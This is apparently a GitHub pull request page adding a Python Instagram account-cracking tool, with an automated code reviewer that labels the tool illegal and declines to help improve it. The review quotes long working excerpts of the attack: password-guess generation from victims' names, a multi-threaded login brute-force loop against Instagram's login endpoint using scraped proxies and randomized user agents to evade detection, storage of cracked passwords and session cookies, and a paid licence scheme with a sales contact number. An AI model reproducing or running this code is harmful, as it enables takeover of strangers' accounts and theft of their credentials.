MUNNA #140
Open
MUNNA #140
+965
−0
Conversation
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
MUNNA DON H3R3
WalkthroughA new Python file introduces an Instagram account management and cracking tool. It features login via cookies or credentials, license key validation, user enumeration, password guessing, session management, and a menu-driven interface. The script supports multi-threaded operations, proxy and user-agent randomization, and error handling, with results saved to files. Changes
Sequence Diagram(s)sequenceDiagram
participant User
participant Tool
participant InstagramAPI
participant LicenseServer
User->>Tool: Launch and select menu option
Tool->>LicenseServer: Validate or obtain license key
LicenseServer-->>Tool: License status (valid/invalid)
Tool->>User: Prompt for login (cookie or credentials)
User->>Tool: Provide credentials or cookie
Tool->>InstagramAPI: Attempt login/validate session
InstagramAPI-->>Tool: Login response (success/fail)
Tool->>User: Show menu (crack, info, unfollow, etc.)
User->>Tool: Select operation (e.g., crack)
Tool->>InstagramAPI: Enumerate targets, attempt password(s)
InstagramAPI-->>Tool: Cracking results (success/checkpoint/fail)
Tool->>User: Display/save results
Poem
Thanks for using CodeRabbit! It's free for OSS, and your support helps us grow. If you like it, consider giving us a shout-out. 🪧 TipsChatThere are 3 ways to chat with CodeRabbit:
SupportNeed help? Create a ticket on our support page for assistance with any issues or questions. Note: Be mindful of the bot's finite context window. It's strongly recommended to break down tasks such as reading entire modules into smaller chunks. For a focused discussion, use review comments to chat about specific files and their changes, instead of using the PR comments. CodeRabbit Commands (Invoked using PR comments)
Other keywords and placeholders
CodeRabbit Configuration File (
|
![coderabbitai[bot]](https://avatars.githubusercontent.com/in/347564?s=60&v=4){kind=small}
There was a problem hiding this comment.
Actionable comments posted: 10
🔭 Outside diff range comments (1)
Munna bihari ka sarver (1)
1-966: Critical: This entire file implements an illegal Instagram account cracking toolThis code appears to be designed for unauthorized access to Instagram accounts through password brute-forcing, which is:
- Illegal under computer fraud and abuse laws in most jurisdictions
- A violation of Instagram's Terms of Service
- Potentially facilitating identity theft, harassment, and privacy violations
I cannot provide assistance with improving or fixing this code as it's designed for malicious purposes. The entire file should be removed.
Comment on lines
+399
to
+468
| def passwordAPI(self,xnx): | ||
| print('[•] Total User : %s\n'%(len(internal))) | ||
| print('[1] FirstName123 Firstname1234\n[2] FirtsName123 Firstname1234 Firstname12345 FullName\n[3] FirstName+123,FullName,Full Name\n[4] Password Manual\n') | ||
| c=input(f'[•] Password : ') | ||
| if c=='1': | ||
| self.generateAPI(xnx,c) | ||
| elif c=='2': | ||
| self.generateAPI(xnx,c) | ||
| elif c=='3': | ||
| self.generateAPI(xnx,c) | ||
| elif c=='7': | ||
| self.generateAPI(xnx,c) | ||
| elif c=='4': | ||
| ui='# PASSWORD MANUAL' | ||
| uu=mark(ui,style='') | ||
| sol().print(uu) | ||
| print(f'{M} Contoh sayang,anjing,bangsat') | ||
| print('') | ||
| zx=input(f'{CY}[•] List password :{C} ') | ||
| self.generateAPI(xnx,c,zx) | ||
| else: | ||
| self.passwordAPI(xnx) | ||
|
|
||
| def generateAPI(self,user,o,zx=''): | ||
| global prog,des | ||
| prog = Progress(SpinnerColumn('clock'),TextColumn('{task.description}'),BarColumn(),TextColumn('{task.percentage:.0f}%')) | ||
| des = prog.add_task('',total=len(internal)) | ||
| print('\n[•] Hasil OK disimpan ke: result/%s.txt\n[•] Hasil CP disimpan ke: result/%s.txt'%(day,day)) | ||
| print('[•] Jika alamat IP di-spam, aktifkan mode pesawat selama 10 detik\n') | ||
| with prog: | ||
| with ThreadPoolExecutor(max_workers=15) as shinkai: | ||
| for i in user: | ||
| try: | ||
| username=i.split("|")[0] | ||
| password=i.split("|")[1].lower() | ||
| for w in password.split(" "): | ||
| if len(w)<3: | ||
| continue | ||
| else: | ||
| w=w.lower() | ||
| if o=="1": | ||
| if len(w)==3 or len(w)==4 or len(w)==5: | ||
| sandi=[w+'123',w+'1234'] | ||
| else: | ||
| sandi=[w] | ||
| elif o=="2": | ||
| if len(w)==3 or len(w)==4 or len(w)==5: | ||
| sandi=[w+'123',w,w+'1234',w+'12345',w+'123456'] | ||
| else: | ||
| sandi=[w+'123',w,w+'1234',w+'12345',w+'123456'] | ||
| elif o=="3": | ||
| if len(w)==3 or len(w)==4 or len(w)==5: | ||
| sandi=[w,w+'123',w+'1234',w+'12345',w+'123456','1234567',password.lower()] | ||
| else: | ||
| sandi=[w+'123',w,password.lower()] | ||
| elif o=="7": | ||
| if len(w)==3 or len(w)==4 or len(w)==5: | ||
| sandi=[w+'123',w+'1234',w+'12345',w] | ||
| else: | ||
| sandi=[w+'123',w+'1234',w+'12345',password.lower()] | ||
| elif o=="4": | ||
| if len(zx) > 3: | ||
| sandi = zx.replace(" ", "").split(",") | ||
| else: | ||
| break | ||
| shinkai.submit(self.crackAPI,username,sandi) | ||
| except: | ||
| pass | ||
| print('\n[•] Crack Selesai Tod.......') | ||
| exit() |
There was a problem hiding this comment.
Illegal activity: Password brute-forcing implementation
This method implements password generation strategies for brute-force attacks against Instagram accounts.
🤖 Prompt for AI Agents
In Munna bihari ka sarver from lines 399 to 468, the code implements password
brute-forcing methods targeting Instagram accounts, which is illegal and
unethical. Remove or disable the entire passwordAPI and generateAPI methods to
prevent unauthorized access attempts. Replace them with legitimate functionality
or placeholders that comply with legal and ethical standards.
Comment on lines
+817
to
+818
| os.system("xdg-open https://wa.me/+918824167482?text=Hai+bg+rif,+aku+mau+beli+scriptnya+tapi+yang+versi+premium.+Ini+lisensinya:%20"+crot+"+konfirmasi+nama+pembeli:%20"+namamu) | ||
| open(".key.txt","w").write(crot+"\n"+namamu) |
There was a problem hiding this comment.
Hardcoded contact information for illegal tool sales
Contains WhatsApp number for purchasing licenses for this hacking tool.
🤖 Prompt for AI Agents
In Munna bihari ka sarver around lines 817 to 818, the code contains a hardcoded
WhatsApp contact number used for selling licenses of an illegal hacking tool.
Remove or replace this hardcoded contact information to comply with legal and
ethical standards, and ensure the code does not promote or facilitate
unauthorized activities.
Comment on lines
+483
to
+565
| def crackAPI(self,user,pas): | ||
| global loop,success,checkpoint | ||
| prog.update(des,description=f"crack {str(loop)}/{len(internal)} OK : {H}{len(success)}{N} CP : {K}{len(checkpoint)}{N}") | ||
| prog.advance(des) | ||
| try: | ||
| for pw in pas: | ||
| ts = calendar.timegm(current_GMT) | ||
| nip=random.choice(prox) | ||
| proxs= {'http': 'socks5://'+nip} | ||
| aa='Mozilla/5.0 (Linux; Android' | ||
| b=random.choice(['4','5','6','7','8','9','10','11','12']) | ||
| c='BRAVIA 2K GB ATV3)' | ||
| d=random.choice(['A','B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z']) | ||
| e=random.randrange(1, 999) | ||
| f=random.choice(['A','B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z']) | ||
| g='AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132' | ||
| h=random.randrange(73,100) | ||
| i='0' | ||
| j=random.randrange(4200,4900) | ||
| k=random.randrange(40,150) | ||
| l='Mobile Safari/537.36' | ||
| uaku=f'{aa} {b}; {c}{d}{e}{f}) {g}{h}.{i}.{j}.{k} {l}' | ||
| token=s.get('https://www.instagram.com/web/__mid') | ||
| headers = { | ||
| 'Host':'www.instagram.com', | ||
| 'connection':'keep-alive', | ||
| 'sec-ch-ua':'";Not A Brand";v="99", "Chromium";v="94"', | ||
| 'x-ig-app-id':'1217981644879628', | ||
| 'x-ig-www-claim':'0', | ||
| 'sec-ch-ua-mobile': '?1', | ||
| 'x-instagram-ajax':'4b5f8c8eb791', | ||
| 'content-type':'application/x-www-form-urlencoded', | ||
| 'accept':'*/*', | ||
| 'x-requested-with':'XMLHttpRequest', | ||
| 'x-asbd-id':'198387', | ||
| 'user-agent':uaku, | ||
| 'x-csrftoken':token.cookies['csrftoken'], | ||
| 'sec-ch-ua-platform': '"Android"', | ||
| 'origin':'https://www.instagram.com', | ||
| 'sec-fetch-site':'same-origin', | ||
| 'sec-fetch-mode':'cors', | ||
| 'sec-fetch-dest':'empty', | ||
| 'referer':'https://www.instagram.com/accounts/login/?next=/graphql/query/', | ||
| 'accept-language':'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7'} | ||
| param={ | ||
| "enc_password": f"#PWD_INSTAGRAM_BROWSER:0:{ts}:{pw}", | ||
| "username": user, | ||
| "queryParams": "{}", | ||
| "optIntoOneTap": 'false', | ||
| "stopDeletionNonce": "", | ||
| "trustedDeviceRecords": "{}"} | ||
| x=s.post("https://www.instagram.com/accounts/login/ajax/",headers=headers,data=param,proxies=proxs) | ||
| x_jason=json.loads(x.text) | ||
| if "userId" in str(x_jason): | ||
| nama,pengikut,mengikut,postingan=self.APIinfo(user) | ||
| coki = ";".join([key+"="+value.replace('"','') for key, value in x.cookies.get_dict().items()]) | ||
| tree = Tree("") | ||
| tree.add(f"\r{H}{nama} | {user}{N}") | ||
| tree.add(f"\r{N}Pengikut : {H}{pengikut}{N}") | ||
| tree.add(f"\r{N}Mengikuti : {H}{mengikut}{N}") | ||
| tree.add(f"\r{N}Postingan : {H}{postingan}{N}").add(f"\r{N}Token : {H}{coki}{N}") | ||
| prints(tree) | ||
| open(f"result/success-{day}.txt","a").write(f'{user}|{pw}|{pengikut}|{mengikut}|{coki}\n') | ||
| success.append(user) | ||
| #os.popen("play-audio data/dapet.mp3") | ||
| break | ||
| elif 'checkpoint_url' in str(x_jason): | ||
| nama,pengikut,mengikut,postingan=self.APIinfo(user) | ||
| tree = Tree("") | ||
| tree.add(f"\r{M}{nama} | {user} {N} ") | ||
| tree.add(f"\r{N}Pengikut : {K}{pengikut}{N}") | ||
| tree.add(f"\r{N}Mengikuti : {K}{mengikut}{N}") | ||
| tree.add(f"\r{N}Postingan : {H}{postingan}{N}") | ||
| prints(tree) | ||
| open(f"result/checkpoint-{day}.txt","a").write(f'{user}|{pw}|{pengikut}|{mengikut}\n') | ||
| checkpoint.append(user) | ||
| break | ||
| else: | ||
| continue | ||
| loop+=1 | ||
| except: | ||
| self.crackAPI(user,pas) | ||
|
|
There was a problem hiding this comment.
Illegal activity: Account cracking with proxy rotation
The crackAPI method performs the actual password cracking attempts using rotating proxies to evade detection.
🤖 Prompt for AI Agents
In Munna bihari ka sarver from lines 483 to 565, the crackAPI method attempts
unauthorized account access using proxy rotation, which is illegal and
unethical. Remove this entire method and any related code to ensure compliance
with legal and ethical standards. Replace it with legitimate functionality or
remove the feature altogether.
Comment on lines
+792
to
+834
| kentod = random.choice(["MORHE-UUQDM-OOFJR-IBRJZ","ASE-SIPAL-ING-GANSKUIT","LIMPL-XDZGC-NNVDR-NXGXK","LHEZL-RPKJG-IPPOR-YWXGV","JOJQR-GKFVW-VLYJT-UNITI","GSNEP-NTRCE-CTKYK-OIAGD","LTQVM-NRQSC-LVJCL-SVQTD","HCYUY-ADXUB-MPCVJ-DGNQE","JHSQH-YAYOT-WDWFU-FAYIV","MTIRZ-YXKRT-ZEYGN-UWJMK","LWGOO-ZPRNJ-FKDXT-YNBZB","GTSCS-MEXZL-YXMLX-NLUCT","KWQRM-ROFYY-YLBST-BKXAE","LISBX-TPVSB-WXKEV-XOMIB","JVFEN-WKCFP-XLLXV-GAKUS","LEHBK-GBLHK-NACGN-EEHUW","KAEPL-IBDPP-WQYGN-PMUSI","KVIZG-ILJVO-EKFYT-THGKZ"]) | ||
|
|
||
|
|
||
| kentodd=random.choice([kentod]) | ||
|
|
||
|
|
||
| crot=(kentodd) | ||
|
|
||
| def getkey(): | ||
| import json, requests | ||
| try: | ||
| openkey = open(".key.txt","r").read() | ||
| files = openkey.split("\n")[1] | ||
| key = openkey.split("\n")[0] | ||
| except FileNotFoundError: | ||
| #os.system("clear") | ||
| #none();time.sleep(1) | ||
| print("\n\033[0m•> Author breaksek ") | ||
| print("\033[0m•> License Anda Tidak Tersedia ");time.sleep(2) | ||
| print("\n~> 100k : 1 bulan\n~> 50k : 2 minggu\n~> 25k : 1 Minggu") | ||
| print ("") | ||
| print("\033[0m•> license anda :\033[32m "+crot);time.sleep(1) | ||
| namamu = input("\033[0m•> nama anda : ") | ||
| yt = input("\033[0m•> Chat Admin Untuk Beli Lisensi y/t? > ") | ||
| if yt in ["Y","y"]: | ||
| os.system("xdg-open https://wa.me/+918824167482?text=Hai+bg+rif,+aku+mau+beli+scriptnya+tapi+yang+versi+premium.+Ini+lisensinya:%20"+crot+"+konfirmasi+nama+pembeli:%20"+namamu) | ||
| open(".key.txt","w").write(crot+"\n"+namamu) | ||
| exit() | ||
| else: | ||
| exit("\033[0m•> Telah keluar program") | ||
| try: | ||
| confirmkey = requests.get("https://github.com/Billa303/APROVAL2/blob/main/Updatebookmark.txt").json() | ||
| except requests.exceptions.ConnectionError: | ||
| print("\033[0m[!] Jaringan Internet Kamu Tidak Ada");exit() | ||
| if confirmkey[files] == key: | ||
| if confirmkey[files] == "tidakada": | ||
| print("\n\033[0m~> Lisensi key Kamu Sudah Kadaluarsa <~") | ||
| os.system("rm -rf .key.txt");exit() | ||
| else: | ||
| print("\n\033[0m~> Lisensi key Kamu Sudah Aktif <~");time.sleep(1);login_kamu() | ||
| else: | ||
| print("\n\033[0m╰─ Lisensi key Kamu Sudah Kadaluarsa") | ||
| os.system("rm -rf .key.txt");exit() |
There was a problem hiding this comment.
Commercial distribution of hacking tools
The license key system indicates this tool is being sold commercially, which could constitute criminal enterprise.
🤖 Prompt for AI Agents
In Munna bihari ka sarver from lines 792 to 834, the code implements a license
key system that facilitates commercial distribution of the tool, which raises
legal and ethical concerns. To address this, remove or disable the license key
validation logic and any related commercial distribution prompts to prevent
unauthorized or commercial use. Replace the license check with a simple usage
message or remove it entirely to ensure compliance with legal standards.
Comment on lines
+545
to
+546
| open(f"result/success-{day}.txt","a").write(f'{user}|{pw}|{pengikut}|{mengikut}|{coki}\n') | ||
| success.append(user) |
There was a problem hiding this comment.
PII leakage: Saving compromised account credentials
Successfully cracked accounts are saved to files with passwords and cookies, creating a database of stolen credentials.
open(f"result/success-{day}.txt","a").write(f'{user}|{pw}|{pengikut}|{mengikut}|{coki}\n')🤖 Prompt for AI Agents
In Munna bihari ka sarver around lines 545 to 546, the code saves compromised
account credentials including passwords and cookies to a file, which causes PII
leakage. To fix this, remove or anonymize sensitive information such as
passwords and cookies before writing to the file, or avoid saving these details
altogether to protect user privacy.
Comment on lines
+24
to
+45
| print('\n [×] Modul requests belum terinstall!...\n') | ||
| os.system('pip install requests') | ||
|
|
||
| try: | ||
| import concurrent.futures | ||
| except ImportError: | ||
| print('\n [×] Modul Futures belum terinstall!...\n') | ||
| os.system('pip install futures') | ||
|
|
||
| try: | ||
| import bs4 | ||
| except ImportError: | ||
| print('\n [×] Modul Bs4 belum terinstall!...\n') | ||
| os.system('pip install bs4') | ||
|
|
||
| try: | ||
| import stdiomask | ||
| except ImportError: | ||
| catet_mask = ('# • sedang menginstall modul stdiomask •') | ||
| mask = rich.markdown.Markdown(catet_mask, style='green') | ||
| rich.console.Console().print(mask) | ||
| os.system('pip install stdiomask') |
There was a problem hiding this comment.
Security risk: Automatic module installation without user consent
Automatically installing packages via pip is dangerous as it could install malicious packages if the system is compromised.
🤖 Prompt for AI Agents
In Munna bihari ka sarver between lines 24 and 45, the code automatically
installs missing Python modules using pip without user consent, which poses a
security risk. Modify the code to remove automatic installation commands and
instead print clear instructions prompting the user to manually install the
required modules. This approach avoids executing potentially unsafe commands and
respects user control over their environment.
Comment on lines
+105
to
+110
| prox= requests.get('https://api.proxyscrape.com/v2/?request=displayproxies&protocol=socks4&timeout=100000&country=all&ssl=all&anonymity=all').text | ||
| open('.prox.txt','w').write(prox) | ||
| except Exception as e: | ||
| print('GAGAL') | ||
|
|
||
| prox=open('.prox.txt','r').read().splitlines() |
There was a problem hiding this comment.
Security and privacy violation: Downloading and using third-party proxies
This code downloads proxies from an external source to evade Instagram's rate limiting and detection mechanisms.
🤖 Prompt for AI Agents
In Munna bihari ka sarver around lines 105 to 110, the code downloads proxies
from an external third-party source, which poses security and privacy risks. To
fix this, remove the code that fetches and writes proxies from the external URL
and instead use a secure, internally managed proxy list or a trusted proxy
provider with proper authorization and compliance. Ensure no external unverified
proxy sources are used to avoid potential security issues.
Comment on lines
+277
to
+278
| os.system('xdg-open https://wa.me/6287838563349?text=%s'%(i)) | ||
| exit() |
There was a problem hiding this comment.
PII exposure: Hardcoded phone number
Exposes a phone number in the bug reporting function.
🤖 Prompt for AI Agents
In Munna bihari ka sarver around lines 277 to 278, the phone number is hardcoded
in the URL string, exposing personally identifiable information (PII). To fix
this, remove the hardcoded phone number and replace it with a variable or
configuration value that can be set securely outside the code, such as an
environment variable or a config file entry, ensuring the phone number is not
directly visible in the source code.
Comment on lines
+203
to
+210
| us=input(f'\n[•] Masukkan Username > {C}') | ||
| cok=input(f'[•] Masukkan Cookie > {C}') | ||
| kuki=open('.kukis.log','w').write(cok) | ||
| user=open('.username','w').write(us) | ||
| print(f"[•] Login Succes.... \n[•] Run Again.... ") | ||
| sleep(2.3) | ||
| exit() | ||
| elif loginpil == '2': |
There was a problem hiding this comment.
Critical security issue: Storing Instagram credentials in plaintext
Credentials are stored in plaintext files .kukis.log and .username, which is a severe security vulnerability.
🤖 Prompt for AI Agents
In the file "Munna bihari ka sarver" around lines 203 to 210, the code stores
Instagram credentials in plaintext files '.kukis.log' and '.username', which is
a critical security risk. To fix this, avoid writing sensitive information like
cookies and usernames directly to files. Instead, implement secure storage
mechanisms such as encrypted storage or environment variables, or remove the
storage entirely if not necessary. Ensure that any stored credentials are
encrypted and access-controlled to protect user data.
Comment on lines
+3
to
+15
| try: | ||
| import json | ||
| import uuid | ||
| import hmac | ||
| import random | ||
| import hashlib | ||
| import urllib | ||
| import stdiomask | ||
| import urllib.request | ||
| import calendar | ||
| except ImportError as e: | ||
| exit(f'\n [\033[1;35m>\033[0m] module {e} belum terinstall') | ||
|
|
There was a problem hiding this comment.
Security risk: Missing module imports with generic error handling
The generic ImportError handling could hide important security issues and makes debugging difficult.
-except ImportError as e:
- exit(f'\n [\033[1;35m>\033[0m] module {e} belum terinstall')
+except ImportError as e:
+ print(f'\n [\033[1;35m>\033[0m] module {e} is not installed')
+ sys.exit(1)Committable suggestion skipped: line range outside the PR's diff.
🤖 Prompt for AI Agents
In Munna bihari ka sarver around lines 3 to 15, the generic ImportError handling
with exit and a simple message can obscure specific missing modules and
potential security issues. Replace the generic except block with individual
import checks or more detailed error handling that specifies which module failed
to import and why, allowing clearer debugging and avoiding hiding critical
import failures.
|
MUNNA DON H3R3 |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
1 participant
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
MUNNA DON H3R3
Summary by CodeRabbit